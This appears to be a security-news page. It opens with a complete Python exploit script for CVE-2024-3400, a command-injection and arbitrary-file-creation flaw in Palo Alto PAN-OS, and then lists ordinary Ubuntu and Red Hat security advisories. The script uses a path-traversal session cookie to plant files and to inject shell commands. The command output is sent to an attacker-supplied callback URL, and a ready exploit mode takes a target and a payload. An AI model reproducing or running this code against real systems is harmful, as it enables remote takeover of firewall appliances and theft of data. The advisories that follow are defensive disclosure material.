Palo Alto PAN-OS versions prior to 11.1.2-h3 command injection and arbitrary file creation exploit.

    # Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400# Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400#!/usr/bin/env python3import systry:    import argparse    import requestsexcept ImportError:    print("Missing dependencies, either requests or argparse not installed")    sys.exit(2)# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/def check_vuln(target: str, file: str) -> bool:    ret = False        uri = "/ssl-vpn/hipreport.esp"        s = requests.Session()    r = ""        headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"    }         headers_noCookie = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0    }        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if r.status_code == 200:        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )        if r.status_code == 403:            print("Target vulnerable to CVE-2024-3400")            ret = True    else:        return ret    return ret        def cmdexec(target: str, callback_url: str, payload: str) -> bool:    ret = False    p = ""    if " " in payload:        p = payload.replace(" ", "${IFS)")    uri = "/ssl-vpn/hipreport.esp"    headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"            }     s = requests.Session()    r = ""        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if not "Success" in r.text:        return ret    else:        ret = True    return ret#Initilize parser for argumentsdef argparser(selection=None):    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )        subparser = parser.add_subparsers( help="Available modules", dest="module")        exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )    #---------------------------------------    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )    args = parser.parse_args(selection)    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])        if args.module == "exploit":            cmdexec(args.target, args.callbackurl, args.payload)    if args.module == "check":        check_vuln(args.target, args.filename)if __name__ == "__main__":    argparser()    print("Finished !")

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Ubuntu Security Notice 6744-1 - Hugo van Kemenade discovered that Pillow was not properly performing bounds checks when processing an ICC file, which could lead to a buffer overflow. If a user or automated system were tricked into processing a specially crafted ICC file, an attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6744-1  
April 22, 2024

pillow vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Pillow could be made to crash or run programs as an administrator  
if it opened a specially crafted file.

Software Description:  
- pillow: Python Imaging Library

Details:

Hugo van Kemenade discovered that Pillow was not properly performing  
bounds checks when processing an ICC file, which could lead to a buffer  
overflow. If a user or automated system were tricked into processing a  
specially crafted ICC file, an attacker could possibly use this issue  
to cause a denial of service or execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   python3-pil                     10.0.0-1ubuntu0.2

Ubuntu 22.04 LTS:  
   python3-pil                     9.0.1-1ubuntu0.3

Ubuntu 20.04 LTS:  
   python3-pil                     7.0.0-4ubuntu0.9

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   python-pil                      5.1.0-1ubuntu0.8+esm1  
   python3-pil                     5.1.0-1ubuntu0.8+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   python-pil                      3.1.2-0ubuntu1.6+esm2  
   python3-pil                     3.1.2-0ubuntu1.6+esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   python-pil                      2.3.0-1ubuntu3.4+esm4  
   python3-pil                     2.3.0-1ubuntu3.4+esm4

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6744-1  
   CVE-2024-28219

Package Information:  
   https://launchpad.net/ubuntu/+source/pillow/10.0.0-1ubuntu0.2  
   https://launchpad.net/ubuntu/+source/pillow/9.0.1-1ubuntu0.3  
   https://launchpad.net/ubuntu/+source/pillow/7.0.0-4ubuntu0.9

Ubuntu Security Notice USN-6744-1

Ubuntu Security Notice 6745-1 - It was discovered that in Percona XtraBackup, a local crafted filename could trigger arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6745-1April 22, 2024percona-xtrabackup vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:percona-xtrabackup could be made to run programs as your login if itopened a specially crafted file.Software Description:- percona-xtrabackup: Open source backup tool for InnoDB and XtraDBDetails:It was discovered that in Percona XtraBackup, a local crafted filenamecould trigger arbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):  percona-xtrabackup              2.4.9-0ubuntu2+esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):  percona-xtrabackup              2.3.7-0ubuntu0.16.04.2+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6745-1  CVE-2022-25834

Ubuntu Security Notice USN-6745-1

Ubuntu Security Notice 6738-1 - Fabian Bäumer, Marcus Brinkmann, and Joerg Schwenk discovered that LXD incorrectly handled the handshake phase and the use of sequence numbers in SSH Binary Packet Protocol. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to bypass integrity checks.

    ==========================================================================Ubuntu Security Notice USN-6738-1April 22, 2024lxd vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:LXD could be made to bypass integrity checks if it received specially craftedinput.Software Description:- lxd: Container hypervisor based on LXCDetails:Fabian Bäumer, Marcus Brinkmann, and Jörg Schwenk discovered that LXDincorrectly handled the handshake phase and the use of sequence numbers in SSHBinary Packet Protocol (BPP). If a user or an automated system were trickedinto opening a specially crafted input file, a remote attacker could possiblyuse this issue to bypass integrity checks.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):   lxd                             3.0.3-0ubuntu1~18.04.2+esm1   lxd-client                      3.0.3-0ubuntu1~18.04.2+esm1   lxd-tools                       3.0.3-0ubuntu1~18.04.2+esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):   golang-github-lxc-lxd-dev       2.0.11-0ubuntu1~16.04.4+esm1   lxc2                            2.0.11-0ubuntu1~16.04.4+esm1   lxd                             2.0.11-0ubuntu1~16.04.4+esm1   lxd-client                      2.0.11-0ubuntu1~16.04.4+esm1   lxd-tools                       2.0.11-0ubuntu1~16.04.4+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6738-1   CVE-2023-48795

Ubuntu Security Notice USN-6738-1

Red Hat Security Advisory 2024-1963-03 - An update for golang is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1963.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: golang security updateAdvisory ID:        RHSA-2024:1963-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1963Issue date:         2024-04-23Revision:           03CVE Names:          CVE-2023-45288====================================================================Summary: An update for golang is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The golang packages provide the Go programming language compiler.Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45288References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-1963-03

Red Hat Security Advisory 2024-1962-03 - An update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1962.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: go-toolset:rhel8 security updateAdvisory ID:        RHSA-2024:1962-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1962Issue date:         2024-04-23Revision:           03CVE Names:          CVE-2023-45288====================================================================Summary: An update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45288References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-1962-03

Red Hat Security Advisory 2024-1961-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1961.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:1961-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1961Issue date:         2024-04-23Revision:           03CVE Names:          CVE-2023-3812====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: tun: bugs for oversize packet when napi frags enabled in tun_napi_alloc_frags (CVE-2023-3812)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3812References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2224048

Red Hat Security Advisory 2024-1961-03

Red Hat Security Advisory 2024-1960-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 7. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1960.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:1960-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1960Issue date:         2024-04-23Revision:           03CVE Names:          CVE-2023-4622====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4622References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2237757https://bugzilla.redhat.com/show_bug.cgi?id=2237760

Red Hat Security Advisory 2024-1960-03

Red Hat Security Advisory 2024-1959-03 - An update for shim is now available for Red Hat Enterprise Linux 7. Issues addressed include buffer overflow, bypass, integer overflow, and out of bounds read vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1959.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: shim security update  
Advisory ID:        RHSA-2024:1959-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1959  
Issue date:         2024-04-23  
Revision:           03  
CVE Names:          CVE-2023-40546  
====================================================================

Summary: 

An update for shim is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The shim package contains a first-stage UEFI boot loader that handles chaining  
to a trusted full boot loader under secure boot environments.

Security Fix(es):

* shim: RCE in http boot support may lead to Secure Boot bypass (CVE-2023-40547)

* shim: Interger overflow leads to heap buffer overflow in verify_sbat_section on 32-bits systems (CVE-2023-40548)

* shim: Out-of-bounds read printing error messages (CVE-2023-40546)

* shim: Out-of-bounds read in verify_buffer_authenticode() malformed PE file (CVE-2023-40549)

* shim: Out-of-bound read in verify_buffer_sbat() (CVE-2023-40550)

* shim: out of bounds read when parsing MZ binaries (CVE-2023-40551)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

IMPORTANT: The new shim revokes ALL VERSIONS of GRUB2 before grub2-2.02-0.87.el7_9.14. Therefore GRUB2 MUST be updated to the latest  
version: grub2-2.02-0.87.el7_9.14 BEFORE or SIMULTANEOUSLY with this shim in order for Secure Boot to continue to work. Failure to update GRUB2 will result in an UNBOOTABLE system.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-40546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2234589  
https://bugzilla.redhat.com/show_bug.cgi?id=2241782  
https://bugzilla.redhat.com/show_bug.cgi?id=2241796  
https://bugzilla.redhat.com/show_bug.cgi?id=2241797  
https://bugzilla.redhat.com/show_bug.cgi?id=2259915  
https://bugzilla.redhat.com/show_bug.cgi?id=2259918  
https://issues.redhat.com/browse/RHEL-2155  
https://issues.redhat.com/browse/RHEL-4382  
https://issues.redhat.com/browse/RHEL-4390

Red Hat Security Advisory 2024-1959-03

Red Hat Security Advisory 2024-1948-03 - An update for Red Hat Build of Apache Camel 3.18 for Quarkus 2.13 is now available. The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products. Red Hat Product Security has rated this update as having a security impact of Important. Issues addressed include denial of service and server-side request forgery vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1948.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Build of Apache Camel 3.18 for Quarkus 2.13 is now available (updates to RHBQ 2.13.9.SP2)  
Advisory ID:        RHSA-2024:1948-03  
Product:            Red Hat Integration  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1948  
Issue date:         2024-04-22  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

An update for Red Hat Build of Apache Camel 3.18 for Quarkus 2.13 is now available (updates to RHBQ 2.13.9.SP2).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products.  
Red Hat Product Security has rated this update as having a security impact of Important.

Description:

An update for Red Hat Build of Apache Camel 3.18 for Quarkus 2.13 is now available (updates to RHBQ 2.13.9.SP2).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:  
* TRIAGE CVE-2024-28752 cxf-core: Apache CXF SSRF Vulnerability using the Aegis databinding  
* TRIAGE CVE-2024-25710 commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file  
* TRIAGE CVE-2024-26308 commons-compress: OutOfMemoryError unpacking broken Pack200 file

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#important

Tag

#vulnerability